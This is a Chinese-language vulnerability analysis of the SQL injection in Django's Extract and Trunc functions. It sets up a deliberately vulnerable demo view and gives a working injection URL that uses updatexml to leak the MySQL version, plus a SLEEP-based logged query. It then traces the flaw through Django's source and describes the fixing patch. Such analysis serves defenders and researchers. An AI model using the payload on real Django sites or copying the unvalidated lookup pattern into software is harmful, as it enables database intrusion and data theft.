Django 3.2.x prior to 3.2.14 Django 4.0.x prior to 4.0.6  环境搭建安装Django
python -m pip install Django==4.0.2创建model
from  django.db import  models# Create your models here. class  exp (models.Model) :     start_datetime = models.DateTimeField()     start_date = models.DateField(null=True , blank=True )     start_time = models.TimeField(null=True , blank=True )     class  Meta :         db_table = "exp" 创建view
from  django.db.models.functions import  Extract, Truncfrom  django.http import  HttpResponsefrom  django.shortcuts import  render# Create your views here. from  .models import  expdef  extractexp (request) :     lookup_name =request.GET.get('name' )     e = exp.objects.filter(start_date__year=Extract('start_datetime' ,lookup_name)).exists()     return  HttpResponse('extract' )urls.py
from  django.urls import  pathfrom  . import  views urlpatterns = [     path('extractexp' , views.extractexp, name='extractexp' ) ]
 
    
项目下的urls.py
from  django.contrib import  adminfrom  django.urls import  path, include urlpatterns = [     path('admin/' , admin.site.urls),     path('exp/' , include("tt.urls" )), ] settings.py注册app
# Application definition  INSTALLED_APPS = [     'tt.apps.TtConfig' ,     'django.contrib.admin' ,     'django.contrib.auth' ,     'django.contrib.contenttypes' ,     'django.contrib.sessions' ,     'django.contrib.messages' ,     'django.contrib.staticfiles' , ]配置数据库
DATABASES = {     'default' : {         'ENGINE' : 'django.db.backends.mysql' ,       # 选择数据库为MySQL          'NAME' : 'django' ,                            # 数据库名称          'HOST' : '127.0.0.1' ,                        # 主机地址          'PORT' : 3306 ,                               # 数据库服务端口,MySQL是3306          'USER' : 'root' ,                             # 数据库账户          'PASSWORD' : 'root'                         # 数据库密码,如果没有密码,该项为空。      } }更新数据库
makemigrations migratepayload http://127.0.0.1:8000/exp/extractexp?name=YEAR FROM start_datetime)) and updatexml(1,concat(1,(select version()),1),1)-- 查看MySQL日志
SELECT  (1 ) AS  `a`  FROM  `exp`  WHERE  EXTRACT (YEAR  FROM  `exp` .`start_date` ) = (EXTRACT (YEAR  FROM  START_DATETIME)) AND  SLEEP (2 )-- FROM `exp`.`start_datetime`)) LIMIT 1 概述 
 
    
漏洞点在于 Django 数据库函数中的两个日期函数:Trunc 和 Extract 。
Extract 用于提取日期,可以提取日期字段中的年、月、日等信息, Trunc 则用于截取,比如 2000-01-01 11:11:11 ,可以根据需求获取到日期 2000-01-01 。
漏洞的关键点在于将未过滤的数据传递给 kind 或 lookup_name 时,会被拼接到SQL语句中,最终导致 SQL 注入漏洞。
class  Extract (TimezoneMixin, Transform) :     lookup_name = None      output_field = IntegerField()     def  __init__ (self, expression, lookup_name=None, tzinfo=None, **extra) :         if  self.lookup_name is  None :             self.lookup_name = lookup_name         if  self.lookup_name is  None :             raise  ValueError('lookup_name must be provided' )         self.tzinfo = tzinfo         super().__init__(expression, **extra)     def  as_sql (self, compiler, connection) :         sql, params = compiler.compile(self.lhs)         lhs_output_field = self.lhs.output_field         if  isinstance(lhs_output_field, DateTimeField):             tzname = self.get_tzname()             sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)         elif  self.tzinfo is  not  None :             raise  ValueError('tzinfo can only be used with DateTimeField.' )         elif  isinstance(lhs_output_field, DateField):             sql = connection.ops.date_extract_sql(self.lookup_name, sql)         elif  isinstance(lhs_output_field, TimeField):             sql = connection.ops.time_extract_sql(self.lookup_name, sql)         elif  isinstance(lhs_output_field, DurationField):             if  not  connection.features.has_native_duration_field:                 raise  ValueError('Extract requires native DurationField database support.' )             sql = connection.ops.time_extract_sql(self.lookup_name, sql)         else :             # resolve_expression has already validated the output_field so this              # assert should never be hit.              assert  False , "Tried to Extract from an invalid type."          return  sql, params     def  resolve_expression (self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False) :         copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)         field = getattr(copy.lhs, 'output_field' , None )         if  field is  None :             return  copy         if  not  isinstance(field, (DateField, DateTimeField, TimeField, DurationField)):             raise  ValueError(                 'Extract input expression must be DateField, DateTimeField, '                  'TimeField, or DurationField.'              )         # Passing dates to functions expecting datetimes is most likely a mistake.          if  type(field) == DateField and  copy.lookup_name in  ('hour' , 'minute' , 'second' ):             raise  ValueError(                 "Cannot extract time component '%s' from DateField '%s'."  % (copy.lookup_name, field.name)             )         if  (             isinstance(field, DurationField) and              copy.lookup_name in  ('year' , 'iso_year' , 'month' , 'week' , 'week_day' , 'iso_week_day' , 'quarter' )         ):             raise  ValueError(                 "Cannot extract component '%s' from DurationField '%s'."                  % (copy.lookup_name, field.name)             )         return  copy
 
    
class  Trunc (TruncBase) :     # RemovedInDjango50Warning: when the deprecation ends, remove is_dst      # argument.      def  __init__ (self, expression, kind, output_field=None, tzinfo=None, is_dst=timezone.NOT_PASSED, **extra) :         self.kind = kind         super().__init__(             expression, output_field=output_field, tzinfo=tzinfo,             is_dst=is_dst, **extra         ) 分析 在 Django 框架自带的 ORM 模型中,当进行 SQL 查询操作时,将调用 django/db/models/query.py 的 QuerySet 类中对应方法进行处理。
def  exists (self) :     if  self._result_cache is  None :         return  self.query.has_results(using=self.db)     return  bool(self._result_cache)跟进到 django/db/models/sql/compiler.py 的 SQLCompiler#compile
def  compile (self, node) :     vendor_impl = getattr(node, 'as_'  + self.connection.vendor, None )     if  vendor_impl:         sql, params = vendor_impl(self, self.connection)     else :         sql, params = node.as_sql(self, self.connection)     return  sql, params继续跟进到 django/db/models/functions/datetime.py  的 Extract#as_sql
def  as_sql (self, compiler, connection) :     sql, params = compiler.compile(self.lhs)     lhs_output_field = self.lhs.output_field     if  isinstance(lhs_output_field, DateTimeField):         tzname = self.get_tzname()         sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)     elif  self.tzinfo is  not  None :         raise  ValueError('tzinfo can only be used with DateTimeField.' )     elif  isinstance(lhs_output_field, DateField):         sql = connection.ops.date_extract_sql(self.lookup_name, sql)     elif  isinstance(lhs_output_field, TimeField):         sql = connection.ops.time_extract_sql(self.lookup_name, sql)     elif  isinstance(lhs_output_field, DurationField):         if  not  connection.features.has_native_duration_field:             raise  ValueError('Extract requires native DurationField database support.' )         sql = connection.ops.time_extract_sql(self.lookup_name, sql)     else :         # resolve_expression has already validated the output_field so this          # assert should never be hit.          assert  False , "Tried to Extract from an invalid type."      return  sql, params因为 demo 中选择的字段 start_datetime 属于 DateTimeField 类型,条件跳转到 datetime_extract_sql 函数
跟进到 django/db/backends/mysql/operations.py 的 DatabaseOperations#datetime_extract_sql
def  datetime_extract_sql 
 
    
(self, lookup_type, field_name, tzname) :     field_name = self._convert_field_to_tz(field_name, tzname)     return  self.date_extract_sql(lookup_type, field_name)继续跟进到 date_extract_sql 函数
def  date_extract_sql (self, lookup_type, field_name) :     # https://dev.mysql.com/doc/mysql/en/date-and-time-functions.html      if  lookup_type == 'week_day' :         # DAYOFWEEK() returns an integer, 1-7, Sunday=1.          return  "DAYOFWEEK(%s)"  % field_name     elif  lookup_type == 'iso_week_day' :         # WEEKDAY() returns an integer, 0-6, Monday=0.          return  "WEEKDAY(%s) + 1"  % field_name     elif  lookup_type == 'week' :         # Override the value of default_week_format for consistency with          # other database backends.          # Mode 3: Monday, 1-53, with 4 or more days this year.          return  "WEEK(%s, 3)"  % field_name     elif  lookup_type == 'iso_year' :         # Get the year part from the YEARWEEK function, which returns a          # number as year * 100 + week.          return  "TRUNCATE(YEARWEEK(%s, 3), -2) / 100"  % field_name     else :         # EXTRACT returns 1-53 based on ISO-8601 for the week number.          return  "EXTRACT(%s FROM %s)"  % (lookup_type.upper(), field_name)直接进入到else分支,对来自 GET 请求参数最终赋值到 lookup_type 参数,只是进行了大写转换,但没有进行任何检查,直接拼接到 SQL 查询语句中。
补丁分析 对比 Django 4.0.6版本:https://github.com/django/django/releases/tag/4.0.6
django/db/models/functions/datetime.py  的 Extract#as_sql 增减了一个判断:
if  not  connection.ops.extract_trunc_lookup_pattern.fullmatch(self.lookup_name):             raise  ValueError("Invalid lookup_name: %s"  % self.lookup_name)跟进到 django/db/backends/base/operations.py 中的BaseDatabaseOperations 类,其中赋值了正则 extract_trunc_lookup_pattern
extract_trunc_lookup_pattern = _lazy_re_compile(r"[\w\-_()]+" )https://www.modb.pro/db/412151
https://cn-sec.com/archives/1173829.html